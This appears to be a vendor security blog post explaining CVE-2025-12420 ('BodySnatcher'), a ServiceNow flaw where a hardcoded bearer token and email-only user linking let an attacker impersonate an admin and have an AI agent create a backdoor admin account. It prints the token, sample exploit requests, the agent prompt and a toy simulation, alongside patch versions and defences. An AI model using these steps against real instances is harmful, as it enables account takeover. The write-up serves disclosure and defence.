Imagine waking up to find a new "backdoor" admin account in your ServiceNow instance. No passwords were leaked, no MFA was bypassed, and no SSO was compromised. Instead, an attacker simply "asked" your AI agent to create it.
This isn't a hypothetical scenario. It’s the reality of CVE-2025-12420, a critical privilege escalation vulnerability nicknamed BodySnatcher.
In this post, we’ll break down how a classic security blunder (a hardcoded secret) combined with the power of AI agents to create a "perfect storm" for enterprise compromise.
The Vulnerability: A Two-Step Identity Crisis
The flaw lives in the interaction between the Virtual Agent API (sn_va_as_service) and Now Assist AI Agents (sn_aia).
The Virtual Agent API is the gateway for external platforms like Slack or Teams to talk to ServiceNow. To keep things secure, it performs two checks:
- Provider Auth: Is the external platform authorized?
- User Linking: Which ServiceNow user is sending the message?
Here is where things went wrong.
1. The Hardcoded "Master Key"
For provider authentication, ServiceNow used a method called Message Auth. The problem? The secret key was hardcoded to servicenowexternalagent across every customer environment.
If you knew that string, you could authenticate as a legitimate external provider on any vulnerable ServiceNow instance.
2. The Email-Only Identity Check
Once "authenticated" as a provider, the system needed to link the session to a user. It used a feature called Auto-Linking, which matched users based solely on their email address.
By combining these two flaws, an attacker could authenticate with the hardcoded secret and then claim to be admin@yourcompany.com. The system would believe them without asking for a password or MFA.
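The core of the identity flaw is easy to see in code. Here is a toy sketch of auto-linking done the flawed way versus the safe way; the function and field names are invented for illustration, not ServiceNow's actual implementation:

```python
# A minimal user directory standing in for sys_user records.
USERS = {"admin@yourcompany.com": {"roles": ["admin"]}}

def link_user_flawed(claimed_email):
    # The vulnerable pattern: trust the caller-supplied email outright.
    # No password, no MFA, no SSO assertion is checked.
    return USERS.get(claimed_email)

def link_user_safe(claimed_email, sso_assertion):
    # The safe pattern: only link the session if a verified identity
    # assertion (e.g. from the SSO provider) matches the claimed email.
    if sso_assertion.get("verified_email") != claimed_email:
        return None
    return USERS.get(claimed_email)
```

With the flawed version, knowing an admin's email address is enough to become that admin; the safe version refuses unless the identity provider has actually verified it.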
Anatomy of the "BodySnatcher" Exploit
The exploit follows a simple but deadly three-step chain.
Step 1: Bypass API Auth
The attacker sends a POST request to the Virtual Agent endpoint using the hardcoded bearer token.
```http
POST /api/sn_va_as_service/v1/virtualagent/message
Host: [your-instance].service-now.com
Authorization: Bearer servicenowexternalagent
Content-Type: application/json

{
  "user_id": "attacker@evil.com",
  "message": "Hello!"
}
```
Step 2: Hijack the Admin Identity
The attacker swaps their ID for a target admin's email.
```json
{
  "user_id": "admin.target@enterprise.com",
  "message": "Start a privileged workflow."
}
```
ServiceNow now treats this session as the administrator.
Step 3: Weaponize the AI Agent
Now the "Agentic Amplification" kicks in. The attacker sends a natural language command to the Record Management AI Agent.
- Attacker: "I need to create a new user."
- Agent: (Triggers the privileged workflow)
- Agent Action: "Creating user 'backdoor' with 'admin' role..."
Because the agent executes actions in the context of the (hijacked) admin, it succeeds. The attacker now has a persistent backdoor.
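The whole three-step chain can be simulated against a toy model of the vulnerable flow. Everything here is a simplified sketch with invented names, not ServiceNow code, but it captures why the chain works:

```python
# Step 0: the secret every vulnerable instance shared.
HARDCODED_TOKEN = "servicenowexternalagent"

USERS = {"admin.target@enterprise.com": {"roles": {"admin"}}}

def vulnerable_flow(bearer, claimed_email, command):
    # Step 1: "provider auth" reduces to a static string comparison.
    if bearer != HARDCODED_TOKEN:
        return "401 Unauthorized"
    # Step 2: auto-linking trusts the claimed email with no credential check.
    user = USERS.get(claimed_email)
    if user is None:
        return "unknown user"
    # Step 3: the agent maps natural language to privileged actions,
    # executing in the linked user's security context.
    if "create" in command.lower() and "admin" in user["roles"]:
        return "created user 'backdoor' with 'admin' role"
    return "ok"
```

One bearer string plus one email address turns a chat message into an admin-level write.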
Why This Matters: Agentic Amplification
BodySnatcher is a watershed moment for Agentic Security. In a traditional app, an auth bypass might let you see a dashboard. In an agentic system, the agent acts as a high-speed execution engine.
The agent’s ability to map natural language to high-privilege API calls drastically shortens the attack path. This is the Agentic Blast Radius: a single conversational command can now compromise entire enterprise systems.
How to Protect Your Instance
If you haven't already, patch immediately.
| Component | Affected Versions | Fixed Versions |
|---|---|---|
| Now Assist AI Agents | 5.0.24 – 5.1.17, 5.2.0 – 5.2.18 | 5.1.18, 5.2.19 |
| Virtual Agent API | <= 3.15.1, 4.0.0 – 4.0.3 | 3.15.2, 4.0.4 |
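If you want to triage quickly, the affected ranges from the table translate into a simple inclusive-bounds check. This is an illustrative helper for the Now Assist AI Agents component only, not an official ServiceNow tool:

```python
def parse(version):
    # "5.2.18" -> (5, 2, 18), so tuples compare numerically.
    return tuple(int(part) for part in version.split("."))

# Affected ranges for Now Assist AI Agents, inclusive on both ends.
AFFECTED_RANGES = [
    (parse("5.0.24"), parse("5.1.17")),
    (parse("5.2.0"), parse("5.2.18")),
]

def is_vulnerable(version):
    v = parse(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)
```

For example, `is_vulnerable("5.2.18")` returns `True`, while the patched `5.2.19` and `5.1.18` fall outside both ranges.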
Beyond the Patch: Best Practices
- **Kill Hardcoded Secrets:** Never use static credentials for API integrations. Use OAuth 2.0 or secure vaults.
- **Identity is Not an Email:** An email address is a public identifier, not a credential. Enforce MFA/SSO at the point of identity linking.
- **Principle of Least Privilege (PoLP):** Narrowly scope what your agents can do. If an agent only needs to file tickets, it shouldn't have the power to create admin users.
- **Implement AI Guardrails:** Use specialized security layers like NeuralTrust to monitor agent behavior in real time and block anomalous administrative actions.
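Two of these practices take only a few lines to get right. The sketch below shows secrets pulled from the environment instead of a string literal, and a per-agent tool allowlist for least privilege; the variable and tool names are illustrative assumptions:

```python
import os

def get_provider_token():
    # Load the integration secret from the environment (or a vault client),
    # never from a literal baked into every deployment.
    token = os.environ.get("VA_PROVIDER_TOKEN")
    if not token:
        raise RuntimeError("VA_PROVIDER_TOKEN is not set")
    return token

# Least privilege: each agent gets an explicit allowlist of tools.
# A ticketing agent has no path to user administration.
AGENT_ALLOWLIST = {
    "ticket_agent": {"create_incident", "update_incident"},
}

def authorize_tool_call(agent, tool):
    # Deny by default: unknown agents and unlisted tools are rejected.
    return tool in AGENT_ALLOWLIST.get(agent, set())
```

Had the Record Management agent been scoped this way, a hijacked session could still file tickets, but "create user 'backdoor' with 'admin' role" would have been refused at the tool boundary.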
Final Reflections
The BodySnatcher vulnerability proves that the most dangerous flaws today aren't just in the AI itself, but in how we connect AI to our existing (and sometimes broken) infrastructure.
As we move toward an autonomous enterprise, we must treat every tool exposed to an AI agent as a high-risk endpoint.
Have you audited your AI agent permissions lately? Let’s discuss in the comments.